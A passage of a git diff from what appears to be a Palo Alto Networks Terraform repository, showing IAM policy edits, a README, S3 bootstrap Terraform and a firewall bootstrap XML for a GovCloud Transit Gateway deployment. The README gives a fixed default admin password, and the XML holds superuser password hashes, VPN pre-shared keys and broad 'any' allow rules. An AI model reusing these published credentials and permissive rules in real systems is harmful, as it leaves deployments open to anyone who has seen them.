-            "inspector:List*",
-            "glacier:List*",
-            "glacier:Get*",
-            "guardduty:List*",
-            "guardduty:Get*",
-            "iam:SimulatePrincipalPolicy",
-            "iam:SimulateCustomPolicy",
-            "kinesis:Describe*",
-            "kinesis:List*",
-            "rds:ListTagsForResource",
-            "sns:List*",
-            "sns:Get*",
-            "sqs:SendMessage",
-            "logs:FilterLogEvents",
-            "logs:Get*",
-            "logs:Describe*",
-            "secretsmanager:List*",
-            "secretsmanager:Describe*",
-            "lambda:List*",
-            "s3:GetAccountPublicAccessBlock",
-            "s3:GetBucketPublicAccessBlock"
-          ],
+                  "Action": [
+                    "apigateway:GET",
+                    "cognito-identity:ListTagsForResource",
+                    "cognito-idp:ListTagsForResource",
+                    "elasticbeanstalk:ListTagsForResource",
+                    "elasticfilesystem:DescribeTags",
+                    "glacier:GetVaultLock",
+                    "glacier:ListTagsForVault",
+                    "logs:GetLogEvents",
+                    "secretsmanager:DescribeSecret",
+                    "ssm:GetParameters",
+                    "ssm:ListTagsForResource",
+                    "sqs:SendMessage",
+                    "elasticmapreduce:ListSecurityConfigurations",
+                    "sns:listSubscriptions"
+                  ],
         "Effect": "Allow",
         "Resource": "*"
       }
     ]
-   }
\ No newline at end of file
+   }
diff --git a/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json b/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json
index 4d9ea73e..a0daa20d 100644
--- a/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json
+++ b/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json
@@ -2,46 +2,24 @@
     "Version": "2012-10-17",
     "Statement": [
       {
-        "Action": [
-          "acm:List*",
-          "apigateway:GET",
-          "appstream:Describe*",
-          "cloudtrail:GetEventSelectors",
-          "cloudtrail:LookupEvents",
-          "cloudsearch:Describe*",
-          "dynamodb:DescribeTable",
-          "ds:Describe*",
-          "elasticache:List*",
-          "eks:List*",
-          "eks:Describe*",
-          "elasticfilesystem:Describe*",
-          "elasticmapreduce:Describe*",
-          "elasticmapreduce:List*",
-          "inspector:Describe*",
-          "inspector:List*",
-          "glacier:List*",
-          "glacier:Get*",
-          "guardduty:List*",
-          "guardduty:Get*",
-          "iam:SimulatePrincipalPolicy",
-          "iam:SimulateCustomPolicy",
-          "kinesis:Describe*",
-          "kinesis:List*",
-          "rds:ListTagsForResource",
-          "sns:List*",
-          "sns:Get*",
-          "sqs:SendMessage",
-          "logs:FilterLogEvents",
-          "logs:Get*",
-          "logs:Describe*",
-          "secretsmanager:List*",
-          "secretsmanager:Describe*",
-          "lambda:List*",
-          "s3:GetAccountPublicAccessBlock",
-          "s3:GetBucketPublicAccessBlock"
-        ],
+                  "Action": [
+                    "apigateway:GET",
+                    "cognito-identity:ListTagsForResource",
+                    "cognito-idp:ListTagsForResource",
+                    "elasticbeanstalk:ListTagsForResource",
+                    "elasticfilesystem:DescribeTags",
+                    "glacier:GetVaultLock",
+                    "glacier:ListTagsForVault",
+                    "logs:GetLogEvents",
+                    "secretsmanager:DescribeSecret",
+                    "ssm:GetParameters",
+                    "ssm:ListTagsForResource",
+                    "sqs:SendMessage",
+                    "elasticmapreduce:ListSecurityConfigurations",
+                    "sns:listSubscriptions"
+                  ],
         "Effect": "Allow",
         "Resource": "*"
       }
     ]
-   }
\ No newline at end of file
+   }
diff --git a/aws/TGW-VPC-GovCloud/README.md b/aws/TGW-VPC-GovCloud/README.md
new file mode 100644
index 00000000..6da38651
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/README.md
@@ -0,0 +1,50 @@
+# Transit Gateway Deployment for North/South and East/West Inspection 
+# The GovCloud Version
+
+This build is a port of existing work to AWS GovCloud. The original may be found here:
+
+https://github.com/wwce/terraform/tree/master/aws/TGW-VPC
+
+This terraform template will deploy a complete Transit Gateway(TGW) solution with Palo Alto Networks VM-Series Firewalls to inspect both N/S and E/W traffic. The follow diagram shows what will be deployed:
+
+![tgw-vpc](https://user-images.githubusercontent.com/21991161/53307956-ff23d680-3862-11e9-9fd1-49cbacb696ea.jpg)
+
+
+ This is a quick overview of what components are deployed
+```
+1.  Security VPC that includes 2 firewalls in seperate AZs.
+2.  The template will create 2 S3 buckets used for bootstrapping the firewall configuration. Do not create the S3 buckets manually.
+3.  Two Spoke VPCs.  Each with two subnets and 1 ubuntu server deployed in it.
+4.  TGW with attachments and routing to support N/S and E/W traffic through the firewalls.
+```
+
+ NOTE: 
+ ``` 
+ 1. There are some things that should be changed in the Variables.tf file.  They are labeled at the top of the file.
+ 2. This assumes that the AWS CLI is installed on the machine doing the deploymnet
+ 3. Here is a link to setting up a creds file to access AWS: 
+       https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html
+ 4. After deployment the firewall username and password are:
+         Username: admin
+         Password: Pal0Alt0@123
+ 5. us-gov-west was used for deployment testing. It should work in other regions provided all underlying features are available.
+
+ ```
+
+ This is a screenshot of the output once the deployment has completed that shows how to connect to the various components:
+
+![tgwout](https://user-images.githubusercontent.com/21991161/53307965-1793f100-3863-11e9-8eaa-fabeb35d7cda.jpg)
+
+
+ # Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
+
+ # License
+
+
+ Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at                                                  
+
+   http://www.apache.org/licenses/LICENSE-2.0                           
+
+ Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.  
diff --git a/aws/TGW-VPC-GovCloud/bootstrap.tf b/aws/TGW-VPC-GovCloud/bootstrap.tf
new file mode 100644
index 00000000..a671bd2b
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/bootstrap.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket" {
+  bucket        = "${var.bootstrap_s3bucket}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "license/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "content" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role" {
+  name = "ngfw_bootstrap_role"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy" {
+  name = "ngfw_bootstrap_policy"
+  role = "${aws_iam_role.bootstrap_role.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws-us-gov:s3:::${var.bootstrap_s3bucket}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws-us-gov:s3:::${var.bootstrap_s3bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile" {
+  name = "ngfw_bootstrap_profile"
+  role = "${aws_iam_role.bootstrap_role.name}"
+  path = "/"
+}
diff --git a/aws/TGW-VPC-GovCloud/bootstrap2.tf b/aws/TGW-VPC-GovCloud/bootstrap2.tf
new file mode 100644
index 00000000..162d4d48
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/bootstrap2.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket2" {
+  bucket        = "${var.bootstrap_s3bucket2}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket2"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files2/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files2/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "license/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "content2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket2.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role2" {
+  name = "ngfw_bootstrap_role2"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy2" {
+  name = "ngfw_bootstrap_policy2"
+  role = "${aws_iam_role.bootstrap_role2.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws-us-gov:s3:::${var.bootstrap_s3bucket2}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws-us-gov:s3:::${var.bootstrap_s3bucket2}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile2" {
+  name = "ngfw_bootstrap_profile2"
+  role = "${aws_iam_role.bootstrap_role2.name}"
+  path = "/"
+}
diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files/bootstrap.xml b/aws/TGW-VPC-GovCloud/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..bb40d875
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/bootstrap_files/bootstrap.xml
@@ -0,0 +1,873 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kouigbds$mrNbt/msQehCS55jxNnYa.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.101.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>FW-1</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Allow SSH">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+                <entry name="EW">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                </entry>
+                <entry name="Allow Outbound">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
